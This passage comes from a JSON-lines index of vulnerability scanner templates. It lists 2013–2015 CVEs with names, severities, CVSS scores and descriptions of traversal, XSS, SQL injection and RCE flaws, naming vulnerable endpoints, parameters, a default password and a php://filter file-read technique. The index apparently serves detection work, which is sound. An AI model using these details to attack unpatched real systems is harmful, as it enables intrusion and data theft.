attackers to inject arbitrary web script or HTML via the package parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-4625.yaml"} +{"ID":"CVE-2013-5528","Info":{"Name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-5528.yaml"} +{"ID":"CVE-2013-5979","Info":{"Name":"Xibo 1.2.2/1.4.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-5979.yaml"} +{"ID":"CVE-2013-6281","Info":{"Name":"WordPress Spreadsheet - Cross-Site Scripting","Severity":"medium","Description":"WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2013/CVE-2013-6281.yaml"} +{"ID":"CVE-2013-7091","Info":{"Name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","Severity":"critical","Description":"A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2013/CVE-2013-7091.yaml"} +{"ID":"CVE-2013-7240","Info":{"Name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2013/CVE-2013-7240.yaml"} +{"ID":"CVE-2014-10037","Info":{"Name":"DomPHP 0.83 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-10037.yaml"} +{"ID":"CVE-2014-1203","Info":{"Name":"Eyou E-Mail \u003c3.6 - Remote Code Execution","Severity":"critical","Description":"Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2014/CVE-2014-1203.yaml"} +{"ID":"CVE-2014-2321","Info":{"Name":"ZTE Cable Modem Web Shell","Severity":"high","Description":"ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-2321.yaml"} +{"ID":"CVE-2014-2323","Info":{"Name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","Severity":"critical","Description":"A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2014/CVE-2014-2323.yaml"} +{"ID":"CVE-2014-2383","Info":{"Name":"Dompdf \u003c v0.6.0 - Local File Inclusion","Severity":"high","Description":"A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-2383.yaml"} +{"ID":"CVE-2014-2908","Info":{"Name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-2908.yaml"} +{"ID":"CVE-2014-2962","Info":{"Name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-2962.yaml"} +{"ID":"CVE-2014-3120","Info":{"Name":"ElasticSearch v1.1.1/1.2 RCE","Severity":"critical","Description":"The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-3120.yaml"} +{"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2014/CVE-2014-3206.yaml"} +{"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-3704.yaml"} +{"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2014/CVE-2014-3744.yaml"} +{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-4210.yaml"} +{"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-4513.yaml"} +{"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4535.yaml"} +{"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4536.yaml"} +{"ID":"CVE-2014-4539","Info":{"Name":"Movies \u003c= 0.6 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4539.yaml"} +{"ID":"CVE-2014-4544","Info":{"Name":"Podcast Channels \u003c 0.28 - Cross-Site Scripting","Severity":"medium","Description":"The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4544.yaml"} +{"ID":"CVE-2014-4550","Info":{"Name":"Shortcode Ninja \u003c= 1.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4550.yaml"} +{"ID":"CVE-2014-4558","Info":{"Name":"WooCommerce Swipe \u003c= 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4558.yaml"} +{"ID":"CVE-2014-4561","Info":{"Name":"Ultimate Weather Plugin \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4561.yaml"} +{"ID":"CVE-2014-4592","Info":{"Name":"WP Planet \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-4592.yaml"} +{"ID":"CVE-2014-4940","Info":{"Name":"WordPress Plugin Tera Charts - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-4940.yaml"} +{"ID":"CVE-2014-4942","Info":{"Name":"WordPress EasyCart \u003c2.0.6 - Information Disclosure","Severity":"low","Description":"WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-4942.yaml"} +{"ID":"CVE-2014-5111","Info":{"Name":"Fonality trixbox - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-5111.yaml"} +{"ID":"CVE-2014-5258","Info":{"Name":"webEdition 6.3.8.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-5258.yaml"} +{"ID":"CVE-2014-5368","Info":{"Name":"WordPress Plugin WP Content Source Control - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-5368.yaml"} +{"ID":"CVE-2014-6271","Info":{"Name":"ShellShock - Remote Code Execution","Severity":"critical","Description":"GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2014/CVE-2014-6271.yaml"} +{"ID":"CVE-2014-6308","Info":{"Name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-6308.yaml"} +{"ID":"CVE-2014-8676","Info":{"Name":"Simple Online Planning Tool \u003c1.3.2 - Local File Inclusion","Severity":"medium","Description":"SOPlanning \u003c1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2014/CVE-2014-8676.yaml"} +{"ID":"CVE-2014-8682","Info":{"Name":"Gogs (Go Git Service) - SQL Injection","Severity":"critical","Description":"Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2014/CVE-2014-8682.yaml"} +{"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-8799.yaml"} +{"ID":"CVE-2014-9094","Info":{"Name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-9094.yaml"} +{"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"high","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2014/CVE-2014-9119.yaml"} +{"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2014/CVE-2014-9444.yaml"} +{"ID":"CVE-2014-9606","Info":{"Name":"Netsweeper 4.0.8 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-9606.yaml"} +{"ID":"CVE-2014-9607","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-9607.yaml"} +{"ID":"CVE-2014-9608","Info":{"Name":"Netsweeper 4.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-9608.yaml"} +{"ID":"CVE-2014-9609","Info":{"Name":"Netsweeper 4.0.8 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2014/CVE-2014-9609.yaml"} +{"ID":"CVE-2014-9614","Info":{"Name":"Netsweeper 4.0.5 - Default Weak Account","Severity":"critical","Description":"The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2014/CVE-2014-9614.yaml"} +{"ID":"CVE-2014-9615","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-9615.yaml"} +{"ID":"CVE-2014-9617","Info":{"Name":"Netsweeper 3.0.6 - Open Redirection","Severity":"medium","Description":"An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2014/CVE-2014-9617.yaml"} +{"ID":"CVE-2014-9618","Info":{"Name":"Netsweeper - Authentication Bypass","Severity":"critical","Description":"The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2014/CVE-2014-9618.yaml"} +{"ID":"CVE-2015-0554","Info":{"Name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","Severity":"high","Description":"ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-0554.yaml"} +{"ID":"CVE-2015-1000005","Info":{"Name":"WordPress Candidate Application Form \u003c= 1.3 - Local File Inclusion","Severity":"high","Description":"WordPress Candidate Application Form \u003c= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-1000005.yaml"} +{"ID":"CVE-2015-1000010","Info":{"Name":"WordPress Simple Image Manipulator \u003c 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-1000010.yaml"} +{"ID":"CVE-2015-1000012","Info":{"Name":"WordPress MyPixs \u003c=0.3 - Local File Inclusion","Severity":"high","Description":"WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-1000012.yaml"} +{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"critical","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-1427.yaml"} +{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-1503.yaml"} +{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"high","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-1579.yaml"} +{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-1880.yaml"} +{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"high","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2067.yaml"} +{"ID":"CVE-2015-2068","Info":{"Name":"Magento Server Mass Importer - Cross-Site Scripting","Severity":"medium","Description":"Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2068.yaml"} +{"ID":"CVE-2015-2080","Info":{"Name":"Eclipse Jetty \u003c9.2.9.v20150224 - Sensitive Information Leakage","Severity":"high","Description":"Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-2080.yaml"} +{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"high","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2166.yaml"} +{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-2807.yaml"} +{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2015/CVE-2015-3035.yaml"} +{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"critical","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3224.yaml"} +{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"high","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3306.yaml"} +{"ID":"CVE-2015-3337","Info":{"Name":"Elasticsearch - Local File Inclusion","Severity":"high","Description":"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3337.yaml"} +{"ID":"CVE-2015-3648","Info":{"Name":"ResourceSpace - Local File inclusion","Severity":"high","Description":"ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-3648.yaml"} +{"ID":"CVE-2015-3897","Info":{"Name":"Bonita BPM Portal \u003c6.5.3 - Local File Inclusion","Severity":"high","Description":"Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-3897.yaml"} +{"ID":"CVE-2015-4050","Info":{"Name":"Symfony - Authentication Bypass","Severity":"high","Description":"Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4050.yaml"} +{"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-4074.yaml"} +{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4127.yaml"} +{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"high","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2015/CVE-2015-4414.yaml"} +{"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-4632.yaml"} +{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"high","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2015/CVE-2015-4666.yaml"} +{"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2015/CVE-2015-4668.yaml"} +{"ID":"CVE-2015-4694","Info":{"Name":"WordPress Zip Attachments \u003c= 1.1.4 - Arbitrary File Retrieval","Severity":"high","Description":"WordPress zip-attachments 